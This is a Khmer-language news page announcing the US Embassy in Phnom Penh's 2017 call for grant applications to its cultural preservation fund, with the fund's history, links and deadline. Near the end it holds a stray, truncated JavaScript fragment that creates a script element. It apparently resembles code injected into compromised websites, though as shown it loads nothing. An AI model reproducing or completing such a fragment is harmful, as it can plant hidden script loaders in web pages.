ព្រឹតិ្តការណ៍ថ្មីៗ

សូមអញ្ជើញដាក់សំណើសុំថវិកាពីមូលនិធិឯកអគ្គរដ្ឋទូតសំរាប់ការអភិរក្សវប្បធម៌

3 ឆ្នាំ មុន 2 តូ សុផល

ភ្នំពេញ៖ ស្ថានទូតអាមេរិកនៅរាជធានីភ្នំពេញសូមប្រកាសអញ្ជើញការដាក់ពាក្យសុំថវិកាពីមូលនិធិឯកអគ្គរដ្ឋទូតសំរាប់ការអភិរក្សវប្បធម៌ (AFCP) សំរាប់ឆ្នាំ ២០១៧

ដែលជួយប្រទេសមានការអភិវឌ្ឍតិច ដូចជាប្រទេសកម្ពុជា ក្នុងការការពារនិងអភិរក្សបេតិកភណ្ឌវប្បធម៌ដ៏ពិសេសរបស់គេ។ មូលនិធិ AFCP ត្រូវបានបង្កើតឡើងនៅឆ្នាំ ២០០០ ដោយសភាសហរដ្ឋអាមេរិក និងត្រូវបានគ្រប់គ្រងដោយការិយាល័យកិច្ចការអប់រំ និងវប្បធម៌របស់ក្រសួងការបរទេសសហរដ្ឋអាមេរិក។

តាំងពីឆ្នាំ ២០០១ មក មូលនិធិ AFCP បានចំណាយថវិកាអស់ជិត ៣ លានដុល្លាអាមេរិក នៅកម្ពុជា តាមរយៈគំរោងចំនួន ១៨ រាប់ពីគំរោងអភិរក្សប្រាសាទភ្នំបាក់ខែងនៅសួនឧទ្យានបូរាណអង្គរ ដល់ការអភិរក្សអក្សរលើស្លឹករឹតដ៏កម្រ នៅបណ្ណាល័យជាតិ។ បញ្ជីទាំងមូលនៃជំនួយរបស់រដ្ឋាភិបាលសហរដ្ឋអាមេរិកចំពោះការអភិរក្សវប្បធម៌នៅកម្ពុជា មាននៅក្នុងគេហទំព័រនេះ http://go.usa.gov/x84r9

អង្គការដែលចង់ដាក់ពាក្យប្រកួតប្រជែងយកថវិកាពីមូលនិធិ AFCP នៅឆ្នាំនេះ អាចស្វែងយល់បន្ថែមតាមរយៈគេហទំព័រនេះ http://go.usa.gov/x84g3/ ។ កាលបរិច្ឆេទនៃការដាក់ពាក្យសុំគឺថ្ងៃទី ៣១ ខែធ្នូ ឆ្នាំ ២០១៦។

ប្រភព៖ Page : U.S. Embassy Phnom Penh, Cambodia

15036543_10154190358898224_6932476287631253410_n 15036724_10154190631268224_4448514041562863828_n 15037144_10154190637398224_3509780778568163358_n 15078508_10154190631423224_4567616528091700361_n 15078918_10154190580673224_1729851811336071013_n 15085503_10154190580728224_592401400039706668_n 15095502_10154190358918224_894359305331428594_n

var d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ